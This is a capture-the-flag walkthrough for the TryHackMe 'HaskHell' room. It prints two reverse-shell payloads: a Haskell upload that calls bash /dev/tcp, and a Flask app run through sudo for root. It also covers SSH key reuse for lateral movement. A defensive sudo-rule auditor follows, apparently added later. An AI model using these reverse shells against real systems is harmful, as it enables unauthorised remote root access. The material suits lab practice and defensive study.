HaskHell

HaskHell - THM

This room nudges you fairly clearly in the right direction, hence the short writeup, straight to the point as always. When you start off, you have two open ports, SSH and HTTP (although on an uncommon port). The professor's website clearly states that you have the opportunity to upload some Haskell. Find the directory where you can upload with some busting. If you, like me at the time of this writing, are no Haskell programmer, Google is your friend. Here I paste the code I used as upload material to obtain a reverse shell:

module Main where
import System.Process

main = callCommand "bash -i >& /dev/tcp/<ip>/<port> 0>&1"

Once you get the reverse shell, grab your first flag (and stabilize the shell, as always). Look around a little: there is a clear opportunity to obtain a shell as user prof by using his private SSH key to log into the system. Once you are prof, check your sudo permissions: you can run any Flask app as root. The path should be clear: let's build a Flask app that gets us a shell as root. My idea was fairly simple; I paste it here:

from flask import Flask
import os
app = Flask(__name__)

@app.route("/")
def index():
    os.system("bash -c 'bash -i >& /dev/tcp/<ip>/<port> 0>&1'")

Once you launch this app (run sudo /usr/bin/flask run AFTER having exported the FLASK_APP environment variable with the name of your Python app), navigate to the newly launched app on localhost:5000 to have this code executed. If you were listening on the port you put in the app code, you should have your root shell by now. Merry hacking.
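Seen from the defender's side, the root step works because a sudo rule for flask run hands root to whoever chooses the code Flask loads. The following is an added example, not part of the original writeup: a small audit of sudo -l output that flags such rules. The function name, the launcher and variable lists, and the sample listing (including the env_keep line and the host name) are assumptions made for illustration.

```python
import re

# Launchers that import and run caller-chosen code. Allowing one under sudo is
# equivalent to allowing a root shell. Illustrative list, not exhaustive.
CODE_LOADERS = {"flask", "python", "python3", "perl", "ruby", "node", "runghc"}
# Variables that choose which code such a launcher loads.
CODE_SELECTING_ENV = {"FLASK_APP", "PYTHONPATH", "PERL5LIB", "RUBYLIB", "NODE_OPTIONS"}

RULE = re.compile(r"^\s*\((?P<runas>[^)]*)\)\s*(?:[A-Z_]+:\s*)*(?P<cmds>/.+)$")
ENV_KEEP = re.compile(r'env_keep\s*\+?=\s*"?([A-Za-z0-9_ ]+)"?')


def audit_sudo_listing(text):
    """Return (severity, message) findings for the text printed by `sudo -l`."""
    findings = []
    kept = set()
    for match in ENV_KEEP.finditer(text):
        kept.update(match.group(1).split())
    for var in sorted(kept & CODE_SELECTING_ENV):
        findings.append(("medium", f"env_keep preserves {var}"))
    for line in text.splitlines():
        rule = RULE.match(line)
        if not rule:
            continue
        runas = rule.group("runas").split(":")[0].strip()
        if runas not in ("root", "ALL"):
            continue
        for cmd in filter(None, (c.strip() for c in rule.group("cmds").split(","))):
            # Flask also auto-loads app.py or wsgi.py from the working
            # directory, so the rule is high severity even without env_keep.
            if cmd.split()[0].rsplit("/", 1)[-1] in CODE_LOADERS:
                findings.append(("high", f"{cmd!r} as {runas} runs caller-supplied code"))
    return findings


# Constructed `sudo -l` output for illustration, not captured from the room.
SAMPLE = """\
Matching Defaults entries for prof on host:
    env_reset, env_keep+=FLASK_APP

User prof may run the following commands on host:
    (root) NOPASSWD: /usr/bin/flask run
    (root) /usr/bin/systemctl status nginx
"""

if __name__ == "__main__":
    for severity, message in audit_sudo_listing(SAMPLE):
        print(f"[{severity}] {message}")
```

A narrower grant points sudo at a root-owned wrapper script with a fixed application path and drops FLASK_APP from env_keep.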

